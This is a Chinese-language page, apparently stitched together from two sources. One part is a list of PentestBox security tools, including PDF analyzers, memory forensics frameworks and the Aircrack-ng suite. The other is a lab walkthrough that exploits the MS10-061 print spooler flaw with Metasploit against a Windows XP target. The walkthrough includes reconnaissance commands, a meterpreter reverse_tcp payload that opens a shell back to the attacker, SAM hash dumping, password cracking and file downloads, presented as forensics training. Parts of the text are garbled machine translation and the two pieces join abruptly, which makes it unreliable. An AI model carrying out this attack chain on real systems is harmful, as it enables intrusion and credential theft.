這個工具不是一個PDF解析器,但它將掃描一個文件尋找某些PDF關鍵詞,允許您識別PDF文檔包含當打開。PDFiD還將處理名稱混淆。
作者:迪迪埃·史蒂文斯
cmd.exe C:\Users\Demon\Desktop >pdfid
PeePDF
peepdf是一個Python工具探索PDF文件為了找出如果文件可以是有害的。這個工具的目的是提供所有必需的組件安全研究員可以在不使用PDF分析 需要3或4工具的所有任務。與peepdf可以看到所有可疑的元素,在文檔中顯示的對象支持最常用的過濾器和編碼,可以解析一個文件的不同版本,對象流和 加密的文件。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >peepdf
rekall
Rekall框架是一個完全開放的工具集合,在GNU通用公共許可證下的Python中實現,用于從易失性內存(RAM)樣本中提取數字工件。提取技術完全獨立于所研究的系統來執行,但是提供了到系統的運行時狀態的可見性。
作者:谷歌
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >rekall cmd.exe C:\Users\Demon\Desktop >winpmem
Volatility
Volatility框架是一個完全開放的工具集合,在GNU通用公共許可證下的Python中實現,用于從易失性內存(RAM)樣本中提取數字工件。提 取技術完全獨立于所研究的系統來執行,但是提供了到系統的運行時狀態的可見性。該框架旨在向人們介紹與從易失性內存采樣中提取數字偽像相關的技術和復雜 性,并為這一令人興奮的研究領域提供進一步工作的平臺。
作者:穩定的基礎
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >volatility
4.13、無線攻擊
Aircrack-ng
Aircrack-ng 802.11是一個WEP和WPA-PSK密鑰破解程序,可以恢復密鑰一旦足夠的數據包捕獲。它實現了標準FMS攻擊以及一些優化KoreK攻擊,以及全新的PTW攻擊,從而使攻擊速度比其他WEP破解工具。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >airbase-ng cmd.exe C:\Users\Demon\Desktop >aircrack-ng cmd.exe C:\Users\Demon\Desktop >aircrack-ng-GUI cmd.exe C:\Users\Demon\Desktop >airdecap-ng cmd.exe C:\Users\Demon\Desktop >airdecloak-ng cmd.exe C:\Users\Demon\Desktop >aireplay-ng cmd.exe C:\Users\Demon\Desktop >airodump-ng cmd.exe C:\Users\Demon\Desktop >airolib-ng cmd.exe C:\Users\Demon\Desktop >airtun-ng cmd.exe C:\Users\Demon\Desktop >besside-ng cmd.exe C:\Users\Demon\Desktop >easside-ng cmd.exe C:\Users\Demon\Desktop >ivstools cmd.exe C:\Users\Demon\Desktop >kstats cmd.exe C:\Users\Demon\Desktop >makeivs-ng cmd.exe C:\Users\Demon\Desktop >packetforge-ng cmd.exe C:\Users\Demon\Desktop >tkiptun-ng cmd.exe C:\Users\Demon\Desktop >wesside-ng cmd.exe C:\Users\Demon\Desktop >wpaclean
4.14、文本編輯器
使PenetestBox更棒,我補充道原子和vim文本編輯器。打開后原子會絕交Atom一邊和終端的屏幕另一方面,雖然vim運行在相同的選項卡。原子分裂做是為了使報告更容易給控制臺訪問和編輯相同的屏幕上。
cmd.exe C:\Users\Demon\Desktop >atom cmd.exe C:\Users\Demon\Desktop >vim
4.15 瀏覽器
PentestBox還包含一個修改后的版本Mozilla Firefox所有的安全插件前安裝。查看所有以前安裝的插件,點擊在這里
cmd.exe C:\Users\Demon\Desktop >firefox
同時,我們已經包括在內SQLite瀏覽器在里面。
Metasploit Framework是一個開源滲透工具,Metasploit滲透測試框架擁有世界上最大的公共測試漏洞數據庫。簡單來說,Metasploit可以用來檢測安全漏洞,另一方面它也可以用來進行入侵。
安全事件響應和取證工具
利用MSF中的攻擊模塊:ms10_061_spoolss
Windows打印后臺程序沒有充分的限制訪問該服務的用戶權限,攻擊者可以通過提交特制的打印請求在Windows系統目錄(%SystemRoot%\system32)中創建文件。
攻擊者可指定任何文件名,包括目錄遍歷,通過發送 WritePrinter 請求,攻擊者可以完全控制創建文件的內容。
將文件寫入到Windows系統目錄(%SystemRoot%\system32)后,通過WMI來部署惡意程序,因為系統會自動運行%SystemRoot%\System32\Wbem\MOF文件夾的mof文件、執行命令。
該漏洞首次被發現并被應用于著名的Stuxnet蠕蟲(俗稱“震網”)
攻擊機:Kali linux 目標機:Windows xp sp2
1)打開控制面板,雙擊“打印和傳真”
2)添加打印機,右鍵選擇 添加打印機
本地打印機,不勾選“自動檢測和安裝驅動”
選擇 使用 LPT1 端口
選一個打印機廠商和型號,我們隨便選一個
給打印機取個名字
選擇共享這個打印機
不打印測試頁
完成設置
1)nmap 掃描
nmap -sS -sU -O -p137-139,445 192.168.1.149
2)查找 NetBIOS 名稱
nmblookup -A 192.168.1.149
NetBIOS工作站名字:WXPSP2
NetBIOS組名:MSHOME
Master Browser:_MSBROWSE_
第二列解釋:NetBIOS后綴
00:Workstation Service(workstation name) 類型:Group
03:Windows Messenger service
06:Remote Access Server
20:File Service(also called Host Record)
21:Remote Access Service client
1B:Domain Master Browser-Primary Domain Controller for a domain
1D:Master Browser
第四列:節點類型
B-node:0x01 Broadcast
P-node:0x02 Peer(WINS only)
M-node:0x04 Mixed(broadcast,then WINS)
H-node:0x08 Hybrid(WINS,then broadcast)
smbclient -L \\\WXPSP2 -I 192.168.1.149 -N
看到了打印共享
1)載入模塊,查看需要配置的參數
2)配置參數
3)設置payload
set PAYLOAD windows/meterpreter/reverse_tcp
4)設置payload參數
5)攻擊
攻擊完成后,建立了遠程會話
惡意程序被寫入到目標機的%SystemRoot%\system32\g9bMJIYNoBtyOS.exe,此程序運行后反彈了一個shell給Kali,從而建立了一個Meterpreter會話。請記錄這個程序的名字,后續會用到
而惡意程序是通過%SystemRoot%\system32\wbem\mof\kT044wvLBYxwGk.mof控制運行的
6)接下來我們可以執行一系列操作
6.1)getuid,getpid
可以看到我們獲取了系統的system權限,getpid得到的是當前Meterpreter會話的進程ID,記住這個PID
6.2)執行shell,可以直接進入目標機的命令行界面
6.3)查找PID 392關聯進程
可以看到正是前面我們寫入的那個惡意程序
6.4)查找PID 392 關聯的網絡鏈接
11.1)進程信息收集
tasklist > forensics_tasklist.txt
11.2)網絡信息收集
netstat -ano > forensics_netstat.txt
11.3)目錄文件信息收集
dir > dir_forensics.txt
11.4)退出shell
利用hashdump獲取SAM數據庫
SAM是Windows XP,Windows Vista和Windows 7中存儲用戶密碼的數據庫文件
將獲取到的信息復制到一個文本文件
1)加載 Helix2008R1 光盤
2)收集信息
選擇 Live Acquisition,填寫相關信息。
等待內存信息收集完成
取證完成,會自動關閉此cmd窗口
3)查看收集的文件
下載我們之前收集的進程信息,網絡信息和惡意程序
download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/
成功破解了管理員密碼
信息收集完成,后續我們將使用Volatility從抓取的內存進行分析